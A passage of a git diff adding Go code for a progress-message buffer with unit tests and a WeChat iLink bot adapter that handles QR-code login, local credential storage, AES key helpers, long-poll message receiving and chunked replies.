+//	reserve: lines reserved for final summary, subtracted from platform limit (e.g., 3)
+//	sendFunc: function to send combined text (e.g., WeChat SendMessage)
+func NewProgressBuffer(maxLines int, sendFunc func(string)) *ProgressBuffer {
+	if maxLines <= 0 {
+		maxLines = 7
+	}
+	return &ProgressBuffer{
+		lines:    make([]string, 0, maxLines),
+		maxLines: maxLines,
+		reserve:  3,
+		sendFunc: sendFunc,
+	}
+}
+
+// Add adds a progress line. Auto-flushes when buffer is full.
+func (b *ProgressBuffer) Add(line string) {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+
+	b.lines = append(b.lines, line)
+	b.total++
+
+	if len(b.lines) >= b.maxLines {
+		b.flushLocked()
+	}
+}
+
+// Flush sends any remaining buffered lines. Call after agent completes.
+func (b *ProgressBuffer) Flush() {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	b.flushLocked()
+}
+
+// flushLocked sends buffered lines and clears the buffer. Must hold b.mu.
+func (b *ProgressBuffer) flushLocked() {
+	if len(b.lines) == 0 || b.sendFunc == nil {
+		return
+	}
+	combined := strings.Join(b.lines, "\n")
+	b.sendFunc(combined)
+	b.lines = b.lines[:0]
+}
diff --git a/internal/messaging/progress_test.go b/internal/messaging/progress_test.go
new file mode 100644
index 0000000..88e8545
--- /dev/null
+++ b/internal/messaging/progress_test.go
@@ -0,0 +1,88 @@
+package messaging
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestProgressBufferBasic(t *testing.T) {
+	var sent []string
+	buf := NewProgressBuffer(7, func(text string) {
+		sent = append(sent, text)
+	})
+
+	buf.Add("line1")
+	buf.Add("line2")
+	buf.Flush()
+
+	if len(sent) != 1 {
+		t.Fatalf("expected 1 flush, got %d", len(sent))
+	}
+	if !strings.Contains(sent[0], "line1") || !strings.Contains(sent[0], "line2") {
+		t.Errorf("unexpected flush content: %s", sent[0])
+	}
+}
+
+func TestProgressBufferAutoFlush(t *testing.T) {
+	var sent []string
+	buf := NewProgressBuffer(3, func(text string) {
+		sent = append(sent, text)
+	})
+
+	buf.Add("a")
+	buf.Add("b")
+	buf.Add("c") // should trigger auto-flush
+
+	if len(sent) != 1 {
+		t.Fatalf("expected 1 auto-flush, got %d", len(sent))
+	}
+	if !strings.Contains(sent[0], "a") || !strings.Contains(sent[0], "c") {
+		t.Errorf("unexpected auto-flush content: %s", sent[0])
+	}
+
+	// Buffer should be empty now
+	buf.Flush()
+	if len(sent) != 1 {
+		t.Errorf("expected no additional flush, got %d total", len(sent)-1)
+	}
+}
+
+func TestProgressBufferMultipleFlushes(t *testing.T) {
+	var sent []string
+	buf := NewProgressBuffer(2, func(text string) {
+		sent = append(sent, text)
+	})
+
+	buf.Add("1")
+	buf.Add("2") // auto-flush
+	buf.Add("3")
+	buf.Flush() // manual flush
+
+	if len(sent) != 2 {
+		t.Fatalf("expected 2 flushes, got %d", len(sent))
+	}
+	if !strings.Contains(sent[0], "1") || !strings.Contains(sent[0], "2") {
+		t.Errorf("first flush: %s", sent[0])
+	}
+	if !strings.Contains(sent[1], "3") {
+		t.Errorf("second flush: %s", sent[1])
+	}
+}
+
+func TestProgressBufferEmpty(t *testing.T) {
+	called := false
+	buf := NewProgressBuffer(7, func(text string) {
+		called = true
+	})
+
+	buf.Flush()
+	if called {
+		t.Error("flush on empty buffer should not call sendFunc")
+	}
+}
+
+func TestProgressBufferNilSendFunc(t *testing.T) {
+	buf := NewProgressBuffer(7, nil)
+	buf.Add("test")
+	buf.Flush() // should not panic
+}
diff --git a/internal/messaging/wechat/auth.go b/internal/messaging/wechat/auth.go
new file mode 100644
index 0000000..1227ac3
--- /dev/null
+++ b/internal/messaging/wechat/auth.go
@@ -0,0 +1,156 @@
+package wechat
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"time"
+)
+
+const (
+	maxQRRefreshCount = 3
+	fixedQRBaseURL    = "https://ilinkai.weixin.qq.com"
+)
+
+// LoadCredentials loads stored credentials from disk.
+func LoadCredentials(path string) (*Credentials, error) {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil, nil
+		}
+		return nil, err
+	}
+	var creds Credentials
+	if err := json.Unmarshal(data, &creds); err != nil {
+		return nil, err
+	}
+	return &creds, nil
+}
+
+// SaveCredentials persists credentials to disk.
+func SaveCredentials(creds *Credentials, path string) error {
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return err
+	}
+	data, _ := json.MarshalIndent(creds, "", "  ")
+	return os.WriteFile(path, append(data, '\n'), 0600)
+}
+
+// ClearCredentials removes stored credentials.
+func ClearCredentials(path string) error {
+	return os.Remove(path)
+}
+
+// LoginOptions configures the login flow.
+type LoginOptions struct {
+	BaseURL   string
+	CredPath  string
+	Force     bool
+	OnQRURL   func(url string)
+	OnScanned func()
+	OnExpired func()
+}
+
+// Login performs QR code login, returning credentials.
+// If stored credentials exist and Force is false, returns them directly.
+func Login(ctx context.Context, client *Client, opts LoginOptions) (*Credentials, error) {
+	baseURL := opts.BaseURL
+	if baseURL == "" {
+		baseURL = DefaultBaseURL
+	}
+
+	if !opts.Force {
+		creds, err := LoadCredentials(opts.CredPath)
+		if err == nil && creds != nil {
+			return creds, nil
+		}
+	}
+
+	qrRefreshCount := 0
+	for {
+		qrRefreshCount++
+		if qrRefreshCount > maxQRRefreshCount {
+			return nil, fmt.Errorf("QR code expired %d times — login aborted", maxQRRefreshCount)
+		}
+
+		qr, err := client.GetQRCode(ctx, fixedQRBaseURL)
+		if err != nil {
+			return nil, fmt.Errorf("get QR code: %w", err)
+		}
+
+		if opts.OnQRURL != nil {
+			opts.OnQRURL(qr.QRCodeImgURL)
+		} else {
+			fmt.Fprintf(os.Stderr, "Scan this URL in WeChat: %s\n", qr.QRCodeImgURL)
+		}
+
+		lastStatus := ""
+		currentPollBaseURL := fixedQRBaseURL
+		for {
+			status, err := client.PollQRStatus(ctx, currentPollBaseURL, qr.QRCode)
+			if err != nil {
+				return nil, fmt.Errorf("poll QR status: %w", err)
+			}
+
+			if status.Status != lastStatus {
+				lastStatus = status.Status
+				switch status.Status {
+				case "scaned":
+					if opts.OnScanned != nil {
+						opts.OnScanned()
+					} else {
+						fmt.Fprintln(os.Stderr, "QR scanned — confirm in WeChat")
+					}
+				case "expired":
+					if opts.OnExpired != nil {
+						opts.OnExpired()
+					} else {
+						fmt.Fprintln(os.Stderr, "QR expired — requesting new one")
+					}
+				case "confirmed":
+					fmt.Fprintln(os.Stderr, "Login confirmed")
+				}
+			}
+
+			if status.Status == "confirmed" {
+				if status.BotToken == "" || status.BotID == "" || status.UserID == "" {
+					return nil, fmt.Errorf("login confirmed but missing credentials")
+				}
+				resolvedBase := baseURL
+				if status.BaseURL != "" {
+					resolvedBase = status.BaseURL
+				}
+				creds := &Credentials{
+					Token:     status.BotToken,
+					BaseURL:   resolvedBase,
+					AccountID: status.BotID,
+					UserID:    status.UserID,
+					SavedAt:   time.Now().UTC().Format(time.RFC3339),
+				}
+				if err := SaveCredentials(creds, opts.CredPath); err != nil {
+					fmt.Fprintf(os.Stderr, "Warning: could not save credentials: %v\n", err)
+				}
+				return creds, nil
+			}
+
+			if status.Status == "scaned_but_redirect" {
+				if status.RedirectHost != "" {
+					currentPollBaseURL = "https://" + status.RedirectHost
+					fmt.Fprintf(os.Stderr, "IDC redirect → %s\n", status.RedirectHost)
+				}
+				time.Sleep(2 * time.Second)
+				continue
+			}
+
+			if status.Status == "expired" {
+				break
+			}
+
+			time.Sleep(2 * time.Second)
+		}
+	}
+}
diff --git a/internal/messaging/wechat/crypto.go b/internal/messaging/wechat/crypto.go
new file mode 100644
index 0000000..7ea72a2
--- /dev/null
+++ b/internal/messaging/wechat/crypto.go
@@ -0,0 +1,107 @@
+package wechat
+
+import (
+	"crypto/aes"
+	"crypto/rand"
+	"encoding/base64"
+	"encoding/hex"
+	"fmt"
+	"regexp"
+)
+
+var hexPattern = regexp.MustCompile(`^[0-9a-fA-F]{32}$`)
+
+// EncryptAESECB encrypts plaintext with AES-128-ECB and PKCS7 padding.
+func EncryptAESECB(plaintext, key []byte) ([]byte, error) {
+	if len(key) != 16 {
+		return nil, fmt.Errorf("AES key must be 16 bytes, got %d", len(key))
+	}
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return nil, err
+	}
+	padded := pkcs7Pad(plaintext, aes.BlockSize)
+	ciphertext := make([]byte, len(padded))
+	for i := 0; i < len(padded); i += aes.BlockSize {
+		block.Encrypt(ciphertext[i:i+aes.BlockSize], padded[i:i+aes.BlockSize])
+	}
+	return ciphertext, nil
+}
+
+// DecryptAESECB decrypts AES-128-ECB ciphertext and removes PKCS7 padding.
+func DecryptAESECB(ciphertext, key []byte) ([]byte, error) {
+	if len(key) != 16 {
+		return nil, fmt.Errorf("AES key must be 16 bytes, got %d", len(key))
+	}
+	if len(ciphertext)%aes.BlockSize != 0 {
+		return nil, fmt.Errorf("ciphertext length %d is not a multiple of block size", len(ciphertext))
+	}
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return nil, err
+	}
+	plaintext := make([]byte, len(ciphertext))
+	for i := 0; i < len(ciphertext); i += aes.BlockSize {
+		block.Decrypt(plaintext[i:i+aes.BlockSize], ciphertext[i:i+aes.BlockSize])
+	}
+	return pkcs7Unpad(plaintext)
+}
+
+// GenerateAESKey generates a random 16-byte AES key.
+func GenerateAESKey() ([]byte, error) {
+	key := make([]byte, 16)
+	_, err := rand.Read(key)
+	return key, err
+}
+
+// DecodeAESKey decodes an aes_key from the protocol.
+// Handles: direct hex (32 chars), base64(raw 16 bytes), base64(hex string 32 chars).
+func DecodeAESKey(encoded string) ([]byte, error) {
+	if hexPattern.MatchString(encoded) {
+		return hex.DecodeString(encoded)
+	}
+	decoded, err := base64.StdEncoding.DecodeString(encoded)
+	if err != nil {
+		decoded, err = base64.URLEncoding.DecodeString(encoded)
+		if err != nil {
+			return nil, fmt.Errorf("cannot base64 decode aes_key: %w", err)
+		}
+	}
+	if len(decoded) == 16 {
+		return decoded, nil
+	}
+	if len(decoded) == 32 && hexPattern.Match(decoded) {
+		return hex.DecodeString(string(decoded))
+	}
+	return nil, fmt.Errorf("decoded aes_key has unexpected length %d (want 16 or 32)", len(decoded))
+}
+
+// EncodeAESKeyHex returns the hex string of a key.
+func EncodeAESKeyHex(key []byte) string {
+	return hex.EncodeToString(key)
+}
+
+// EncodeAESKeyBase64 returns base64(hex) for CDNMedia.aes_key.
+func EncodeAESKeyBase64(key []byte) string {
+	return base64.StdEncoding.EncodeToString([]byte(hex.EncodeToString(key)))
+}
+
+func pkcs7Pad(data []byte, blockSize int) []byte {
+	padding := blockSize - len(data)%blockSize
+	pad := make([]byte, padding)
+	for i := range pad {
+		pad[i] = byte(padding)
+	}
+	return append(data, pad...)
+}
+
+func pkcs7Unpad(data []byte) ([]byte, error) {
+	if len(data) == 0 {
+		return nil, fmt.Errorf("empty data")
+	}
+	padding := int(data[len(data)-1])
+	if padding > len(data) || padding == 0 {
+		return nil, fmt.Errorf("invalid PKCS7 padding")
+	}
+	return data[:len(data)-padding], nil
+}
diff --git a/internal/messaging/wechat/protocol.go b/internal/messaging/wechat/protocol.go
new file mode 100644
index 0000000..61d12de
--- /dev/null
+++ b/internal/messaging/wechat/protocol.go
@@ -0,0 +1,227 @@
+package wechat
+
+import (
+	"bytes"
+	"context"
+	"crypto/rand"
+	"encoding/base64"
+	"encoding/binary"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"strconv"
+	"time"
+)
+
+const (
+	DefaultBaseURL = "https://ilinkai.weixin.qq.com"
+	CDNBaseURL     = "https://novac2c.cdn.weixin.qq.com/c2c"
+	ChannelVersion = "0.1.0"
+	iLinkAppID     = "bot"
+	iLinkClientVer = "256"
+
+	maxAPIResponseBytes = 1 << 20
+)
+
+// Client wraps HTTP calls to the iLink API.
+type Client struct {
+	HTTP *http.Client
+}
+
+// NewClient creates a protocol client.
+func NewClient() *Client {
+	return &Client{
+		HTTP: &http.Client{Timeout: 45 * time.Second},
+	}
+}
+
+// CommonHeaders returns headers for iLink API requests.
+func CommonHeaders() http.Header {
+	h := http.Header{}
+	h.Set("iLink-App-Id", iLinkAppID)
+	h.Set("iLink-App-ClientVersion", iLinkClientVer)
+	return h
+}
+
+// AuthHeaders returns the standard iLink POST headers.
+func AuthHeaders(token string) http.Header {
+	h := CommonHeaders()
+	h.Set("Content-Type", "application/json")
+	h.Set("AuthorizationType", "ilink_bot_token")
+	h.Set("Authorization", "Bearer "+token)
+	h.Set("X-WECHAT-UIN", randomWechatUIN())
+	return h
+}
+
+func randomWechatUIN() string {
+	var buf [4]byte
+	rand.Read(buf[:])
+	val := binary.BigEndian.Uint32(buf[:])
+	return base64.StdEncoding.EncodeToString([]byte(strconv.FormatUint(uint64(val), 10)))
+}
+
+func baseInfo() map[string]string {
+	return map[string]string{"channel_version": ChannelVersion}
+}
+
+// GetQRCode requests a new QR code for login.
+func (c *Client) GetQRCode(ctx context.Context, baseURL string) (*QRCodeResponse, error) {
+	u := baseURL + "/ilink/bot/get_bot_qrcode?bot_type=3"
+	req, _ := http.NewRequestWithContext(ctx, "GET", u, nil)
+	for k, v := range CommonHeaders() {
+		req.Header[k] = v
+	}
+	resp, err := c.HTTP.Do(req)
+	if err != nil {
+		return nil, fmt.Errorf("get_bot_qrcode: %w", err)
+	}
+	defer resp.Body.Close()
+	var result QRCodeResponse
+	if err := json.NewDecoder(resp.Body).Decode(&result); err != nil {
+		return nil, fmt.Errorf("get_bot_qrcode decode: %w", err)
+	}
+	return &result, nil
+}
+
+// PollQRStatus polls the QR code scan status.
+func (c *Client) PollQRStatus(ctx context.Context, baseURL, qrcode string) (*QRStatusResponse, error) {
+	u := baseURL + "/ilink/bot/get_qrcode_status?qrcode=" + url.QueryEscape(qrcode)
+	req, _ := http.NewRequestWithContext(ctx, "GET", u, nil)
+	for k, v := range CommonHeaders() {
+		req.Header[k] = v
+	}
+	resp, err := c.HTTP.Do(req)
+	if err != nil {
+		return nil, err
+	}
+	defer resp.Body.Close()
+	var result QRStatusResponse
+	json.NewDecoder(resp.Body).Decode(&result)
+	return &result, nil
+}
+
+// apiPost sends a POST to the iLink API and parses the response.
+func (c *Client) apiPost(ctx context.Context, baseURL, endpoint, token string, body interface{}, timeout time.Duration) (json.RawMessage, error) {
+	data, _ := json.Marshal(body)
+	u := baseURL + endpoint
+	httpCtx, cancel := context.WithTimeout(ctx, timeout)
+	defer cancel()
+
+	req, _ := http.NewRequestWithContext(httpCtx, "POST", u, bytes.NewReader(data))
+	for k, v := range AuthHeaders(token) {
+		req.Header[k] = v
+	}
+
+	resp, err := c.HTTP.Do(req)
+	if err != nil {
+		return nil, fmt.Errorf("%s: %w", endpoint, err)
+	}
+	defer resp.Body.Close()
+
+	raw, err := io.ReadAll(io.LimitReader(resp.Body, maxAPIResponseBytes))
+	if err != nil {
+		return nil, fmt.Errorf("%s: read response: %w", endpoint, err)
+	}
+	if resp.StatusCode >= 400 {
+		return nil, &APIError{Message: string(raw), HTTPStatus: resp.StatusCode}
+	}
+
+	var check struct {
+		Ret     int    `json:"ret"`
+		ErrCode int    `json:"errcode"`
+		ErrMsg  string `json:"errmsg"`
+	}
+	json.Unmarshal(raw, &check)
+	if check.Ret != 0 || check.ErrCode != 0 {
+		code := check.ErrCode
+		if code == 0 {
+			code = check.Ret
+		}
+		msg := check.ErrMsg
+		if msg == "" {
+			msg = fmt.Sprintf("ret=%d", check.Ret)
+		}
+		return nil, &APIError{Message: msg, HTTPStatus: resp.StatusCode, ErrCode: code}
+	}
+
+	return json.RawMessage(raw), nil
+}
+
+// GetUpdates performs a long-poll for new messages.
+func (c *Client) GetUpdates(ctx context.Context, baseURL, token, cursor string) (*GetUpdatesResponse, error) {
+	body := map[string]interface{}{
+		"get_updates_buf": cursor,
+		"base_info":       baseInfo(),
+	}
+	raw, err := c.apiPost(ctx, baseURL, "/ilink/bot/getupdates", token, body, 45*time.Second)
+	if err != nil {
+		return nil, err
+	}
+	var result GetUpdatesResponse
+	json.Unmarshal(raw, &result)
+	return &result, nil
+}
+
+// SendMessage sends a message through the iLink API.
+func (c *Client) SendMessage(ctx context.Context, baseURL, token string, msg interface{}) error {
+	body := map[string]interface{}{
+		"msg":       msg,
+		"base_info": baseInfo(),
+	}
+	_, err := c.apiPost(ctx, baseURL, "/ilink/bot/sendmessage", token, body, 15*time.Second)
+	return err
+}
+
+// GetConfig gets the typing ticket for a user.
+func (c *Client) GetConfig(ctx context.Context, baseURL, token, userID, contextToken string) (*GetConfigResponse, error) {
+	body := map[string]interface{}{
+		"ilink_user_id": userID,
+		"context_token": contextToken,
+		"base_info":     baseInfo(),
+	}
+	raw, err := c.apiPost(ctx, baseURL, "/ilink/bot/getconfig", token, body, 15*time.Second)
+	if err != nil {
+		return nil, err
+	}
+	var result GetConfigResponse
+	json.Unmarshal(raw, &result)
+	return &result, nil
+}
+
+// SendTyping sends or cancels the typing indicator.
+func (c *Client) SendTyping(ctx context.Context, baseURL, token, userID, ticket string, status int) error {
+	body := map[string]interface{}{
+		"ilink_user_id": userID,
+		"typing_ticket": ticket,
+		"status":        status,
+		"base_info":     baseInfo(),
+	}
+	_, err := c.apiPost(ctx, baseURL, "/ilink/bot/sendtyping", token, body, 15*time.Second)
+	return err
+}
+
+// BuildTextMessage creates a text message payload.
+func BuildTextMessage(fromUserID, toUserID, contextToken, text string) map[string]interface{} {
+	return map[string]interface{}{
+		"from_user_id":  fromUserID,
+		"to_user_id":    toUserID,
+		"client_id":     newUUID(),
+		"message_type":  2,
+		"message_state": 2,
+		"context_token": contextToken,
+		"item_list": []map[string]interface{}{
+			{"type": 1, "text_item": map[string]string{"text": text}},
+		},
+	}
+}
+
+func newUUID() string {
+	var buf [16]byte
+	rand.Read(buf[:])
+	buf[6] = (buf[6] & 0x0f) | 0x40
+	buf[8] = (buf[8] & 0x3f) | 0x80
+	return fmt.Sprintf("%08x-%04x-%04x-%04x-%012x",
+		buf[0:4], buf[4:6], buf[6:8], buf[8:10], buf[10:16])
+}
diff --git a/internal/messaging/wechat/types.go b/internal/messaging/wechat/types.go
new file mode 100644
index 0000000..e97aefa
--- /dev/null
+++ b/internal/messaging/wechat/types.go
@@ -0,0 +1,122 @@
+// Package wechat implements the WeChat iLink Bot messaging platform adapter.
+// Protocol implementation is based on the iLink Bot API specification.
+// Zero external dependencies — uses only Go standard library.
+package wechat
+
+import (
+	"encoding/json"
+	"fmt"
+	"time"
+)
+
+// --- Message types from iLink protocol ---
+
+// MessageType indicates who sent the message.
+type MessageType int
+
+const (
+	MessageTypeUser MessageType = 1
+	MessageTypeBot  MessageType = 2
+)
+
+// MessageItemType indicates the content type.
+type MessageItemType int
+
+const (
+	ItemText  MessageItemType = 1
+	ItemImage MessageItemType = 2
+	ItemVoice MessageItemType = 3
+	ItemFile  MessageItemType = 4
+	ItemVideo MessageItemType = 5
+)
+
+// --- Wire types (raw JSON from iLink API) ---
+
+// WireMessage is the raw message from the iLink API.
+type WireMessage struct {
+	Seq          int64         `json:"seq,omitempty"`
+	MessageID    int64         `json:"message_id,omitempty"`
+	FromUserID   string        `json:"from_user_id"`
+	ToUserID     string        `json:"to_user_id"`
+	ClientID     string        `json:"client_id"`
+	CreateTimeMs int64         `json:"create_time_ms"`
+	MessageType  MessageType   `json:"message_type"`
+	ContextToken string        `json:"context_token"`
+	ItemList     []MessageItem `json:"item_list"`
+}
+
+// MessageItem is a single content item within a message.
+type MessageItem struct {
+	Type     MessageItemType `json:"type"`
+	TextItem *TextItem       `json:"text_item,omitempty"`
+}
+
+// TextItem holds text content.
+type TextItem struct {
+	Text string `json:"text"`
+}
+
+// --- API response types ---
+
+// QRCodeResponse from get_bot_qrcode.
+type QRCodeResponse struct {
+	QRCode       string `json:"qrcode"`
+	QRCodeImgURL string `json:"qrcode_img_content"`
+}
+
+// QRStatusResponse from get_qrcode_status.
+type QRStatusResponse struct {
+	Status       string `json:"status"`
+	BotToken     string `json:"bot_token,omitempty"`
+	BotID        string `json:"ilink_bot_id,omitempty"`
+	UserID       string `json:"ilink_user_id,omitempty"`
+	BaseURL      string `json:"baseurl,omitempty"`
+	RedirectHost string `json:"redirect_host,omitempty"`
+}
+
+// GetUpdatesResponse from getupdates.
+type GetUpdatesResponse struct {
+	Ret           int               `json:"ret"`
+	Msgs          []json.RawMessage `json:"msgs"`
+	GetUpdatesBuf string            `json:"get_updates_buf"`
+	ErrCode       int               `json:"errcode,omitempty"`
+	ErrMsg        string            `json:"errmsg,omitempty"`
+}
+
+// GetConfigResponse from getconfig.
+type GetConfigResponse struct {
+	TypingTicket string `json:"typing_ticket,omitempty"`
+}
+
+// Credentials holds login credentials.
+type Credentials struct {
+	Token     string `json:"token"`
+	BaseURL   string `json:"baseUrl"`
+	AccountID string `json:"accountId"`
+	UserID    string `json:"userId"`
+	SavedAt   string `json:"savedAt,omitempty"`
+}
+
+// IncomingMessage is a parsed incoming user message.
+type IncomingMessage struct {
+	UserID       string
+	Text         string
+	Timestamp    time.Time
+	ContextToken string
+}
+
+// APIError is returned when the iLink API returns a non-zero ret or HTTP error.
+type APIError struct {
+	Message    string
+	HTTPStatus int
+	ErrCode    int
+}
+
+func (e *APIError) Error() string {
+	return fmt.Sprintf("ilink api: %s (http=%d, errcode=%d)", e.Message, e.HTTPStatus, e.ErrCode)
+}
+
+// IsSessionExpired returns true if this error indicates session timeout.
+func (e *APIError) IsSessionExpired() bool {
+	return e.ErrCode == -14
+}
diff --git a/internal/messaging/wechat/wechat.go b/internal/messaging/wechat/wechat.go
new file mode 100644
index 0000000..9e257a5
--- /dev/null
+++ b/internal/messaging/wechat/wechat.go
@@ -0,0 +1,321 @@
+package wechat
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"log"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+)
+
+// Bot implements messaging.Platform for WeChat via the iLink protocol.
+type Bot struct {
+	client        *Client
+	creds         *Credentials
+	credPath      string
+	autoTyping    bool
+	connected     bool
+	stopped       bool
+	mu            sync.Mutex
+	cancelPoll    context.CancelFunc
+	contextTokens sync.Map // map[userID]contextToken
+	cursor        string
+}
+
+// BotOptions configures a WeChat Bot.
+type BotOptions struct {
+	CredPath   string
+	AutoTyping bool
+}
+
+// NewBot creates a new WeChat bot.
+func NewBot(opts BotOptions) *Bot {
+	return &Bot{
+		client:     NewClient(),
+		credPath:   opts.CredPath,
+		autoTyping: opts.AutoTyping,
+	}
+}
+
+// --- messaging.Platform implementation ---
+
+func (b *Bot) Name() string { return "wechat" }
+
+func (b *Bot) IsConnected() bool {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	return b.connected
+}
+
+// Start begins long-poll message receiving. Blocks until ctx is cancelled.
+func (b *Bot) Start(ctx context.Context, handler messaging.MessageHandler) error {
+	// Load credentials
+	creds, err := LoadCredentials(b.credPath)
+	if err != nil || creds == nil {
+		return fmt.Errorf("wechat: no credentials found at %s — run 'vibecoding hermes wechat login' first", b.credPath)
+	}
+
+	b.mu.Lock()
+	b.creds = creds
+	b.connected = true
+	b.stopped = false
+	pollCtx, cancel := context.WithCancel(ctx)
+	b.cancelPoll = cancel
+	b.mu.Unlock()
+
+	log.Printf("[wechat] Long-poll loop started (user: %s)", creds.UserID)
+	retryDelay := time.Second
+
+	for {
+		select {
+		case <-pollCtx.Done():
+			b.mu.Lock()
+			b.connected = false
+			b.mu.Unlock()
+			log.Printf("[wechat] Long-poll loop stopped")
+			return nil
+		default:
+		}
+
+		b.mu.Lock()
+		currentCreds := b.creds
+		b.mu.Unlock()
+
+		updates, err := b.client.GetUpdates(pollCtx, currentCreds.BaseURL, currentCreds.Token, b.cursor)
+		if err != nil {
+			if pollCtx.Err() != nil {
+				return nil
+			}
+
+			apiErr, isAPI := err.(*APIError)
+			if isAPI && apiErr.IsSessionExpired() {
+				log.Printf("[wechat] Session expired — re-login required")
+				ClearCredentials(b.credPath)
+				b.contextTokens = sync.Map{}
+				b.cursor = ""
+				// Try re-login
+				newCreds, loginErr := Login(pollCtx, b.client, LoginOptions{
+					CredPath: b.credPath,
+					Force:    true,
+				})
+				if loginErr != nil {
+					log.Printf("[wechat] Re-login failed: %v", loginErr)
+					time.Sleep(retryDelay)
+					continue
+				}
+				b.mu.Lock()
+				b.creds = newCreds
+				b.mu.Unlock()
+				retryDelay = time.Second
+				continue
+			}
+
+			log.Printf("[wechat] Poll error: %v", err)
+			time.Sleep(retryDelay)
+			if retryDelay < 10*time.Second {
+				retryDelay *= 2
+			}
+			continue
+		}
+
+		if updates.GetUpdatesBuf != "" {
+			b.cursor = updates.GetUpdatesBuf
+		}
+		retryDelay = time.Second
+
+		for _, rawMsg := range updates.Msgs {
+			var wire WireMessage
+			if err := json.Unmarshal(rawMsg, &wire); err != nil {
+				continue
+			}
+
+			// Remember context tokens
+			b.rememberContext(&wire)
+
+			// Only process user messages
+			if wire.MessageType != MessageTypeUser {
+				continue
+			}
+
+			text := extractText(wire.ItemList)
+			if text == "" {
+				continue
+			}
+
+			msg := messaging.InboundMessage{
+				Platform:  "wechat",
+				ChatID:    wire.FromUserID,
+				UserID:    wire.FromUserID,
+				Text:      text,
+				Timestamp: time.UnixMilli(wire.CreateTimeMs),
+			}
+
+			// Show typing indicator
+			if b.autoTyping {
+				go b.sendTyping(pollCtx, wire.FromUserID)
+			}
+
+			// Handle message
+			go func(m messaging.InboundMessage, ct string) {
+				// Create progress buffer: max 7 progress lines per batch, reserve 3 for summary
+				progressBuf := messaging.NewProgressBuffer(7, func(text string) {
+					if err := b.SendMessage(pollCtx, wire.FromUserID, text); err != nil {
+						log.Printf("[wechat] Progress send error: %v", err)
+					}
+				})
+				m.ProgressFunc = func(text string) {
+					progressBuf.Add(text)
+				}
+
+				response, err := handler(pollCtx, m)
+
+				// Flush remaining progress lines before final summary
+				progressBuf.Flush()
+
+				if err != nil {
+					log.Printf("[wechat] Handler error for %s: %v", m.UserID, err)
+					response = "⚠️ Error: " + err.Error()
+				}
+				if response != "" {
+					if sendErr := b.sendText(pollCtx, m.UserID, response, ct); sendErr != nil {
+						log.Printf("[wechat] Send error for %s: %v", m.UserID, sendErr)
+					} else {
+						log.Printf("[wechat] Message sent to %s successfully (len=%d)", m.UserID, len(response))
+					}
+				} else {
+					log.Printf("[wechat] Empty response for %s, not sending", m.UserID)
+				}
+				// Stop typing
+				if b.autoTyping {
+					b.stopTyping(pollCtx, m.UserID)
+				}
+			}(msg, wire.ContextToken)
+		}
+	}
+}
+
+// Stop gracefully stops the bot.
+func (b *Bot) Stop() error {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+	b.stopped = true
+	if b.cancelPoll != nil {
+		b.cancelPoll()
+	}
+	return nil
+}
+
+// SendMessage sends a text message to a user.
+func (b *Bot) SendMessage(ctx context.Context, chatID string, text string) error {
+	ct, ok := b.contextTokens.Load(chatID)
+	if !ok {
+		return fmt.Errorf("no context_token for user %s", chatID)
+	}
+	return b.sendText(ctx, chatID, text, ct.(string))
+}
+
+// --- Internal ---
+
+func (b *Bot) sendText(ctx context.Context, userID, text, contextToken string) error {
+	b.mu.Lock()
+	creds := b.creds
+	b.mu.Unlock()
+
+	if creds == nil {
+		return fmt.Errorf("not logged in")
+	}
+
+	chunks := chunkText(text, 4000)
+	for _, chunk := range chunks {
+		msg := BuildTextMessage(creds.UserID, userID, contextToken, chunk)
+		if err := b.client.SendMessage(ctx, creds.BaseURL, creds.Token, msg); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (b *Bot) sendTyping(ctx context.Context, userID string) {
+	ct, ok := b.contextTokens.Load(userID)
+	if !ok {
+		return
+	}
+	b.mu.Lock()
+	creds := b.creds
+	b.mu.Unlock()
+	if creds == nil {
+		return
+	}
+	config, err := b.client.GetConfig(ctx, creds.BaseURL, creds.Token, userID, ct.(string))
+	if err != nil || config.TypingTicket == "" {
+		return
+	}
+	b.client.SendTyping(ctx, creds.BaseURL, creds.Token, userID, config.TypingTicket, 1)
+}
+
+func (b *Bot) stopTyping(ctx context.Context, userID string) {
+	ct, ok := b.contextTokens.Load(userID)
+	if !ok {
+		return
+	}
+	b.mu.Lock()
+	creds := b.creds
+	b.mu.Unlock()
+	if creds == nil {
+		return
+	}
+	config, err := b.client.GetConfig(ctx, creds.BaseURL, creds.Token, userID, ct.(string))
+	if err != nil || config.TypingTicket == "" {
+		return
+	}
+	b.client.SendTyping(ctx, creds.BaseURL, creds.Token, userID, config.TypingTicket, 2)
+}
+
+func (b *Bot) rememberContext(wire *WireMessage) {
+	userID := wire.FromUserID
+	if wire.MessageType == MessageTypeBot {
+		userID = wire.ToUserID
+	}
+	if userID != "" && wire.ContextToken != "" {
+		b.contextTokens.Store(userID, wire.ContextToken)
+	}
+}
+
+func extractText(items []MessageItem) string {
+	var parts []string
+	for _, item := range items {
+		if item.Type == ItemText && item.TextItem != nil {
+			parts = append(parts, item.TextItem.Text)
+		}
+	}
+	return strings.Join(parts, "\n")
+}
+
+func chunkText(text string, limit int) []string {
+	if len(text) <= limit {
+		return []string{text}
+	}
+	var chunks []string
+	for len(text) > 0 {
+		if len(text) <= limit {
+			chunks = append(chunks, text)
+			break
+		}
+		cut := limit
+		if idx := strings.LastIndex(text[:limit], "\n\n"); idx > limit*3/10 {
+			cut = idx + 2
+		} else if idx := strings.LastIndex(text[:limit], "\n"); idx > limit*3/10 {
+			cut = idx + 1
+		}
+		chunks = append(chunks, text[:cut])
+		text = text[cut:]
+	}
+	return chunks
+}
+
+// Ensure Bot implements messaging.Platform at compile time.
+var _ messaging.Platform = (*Bot)(nil)
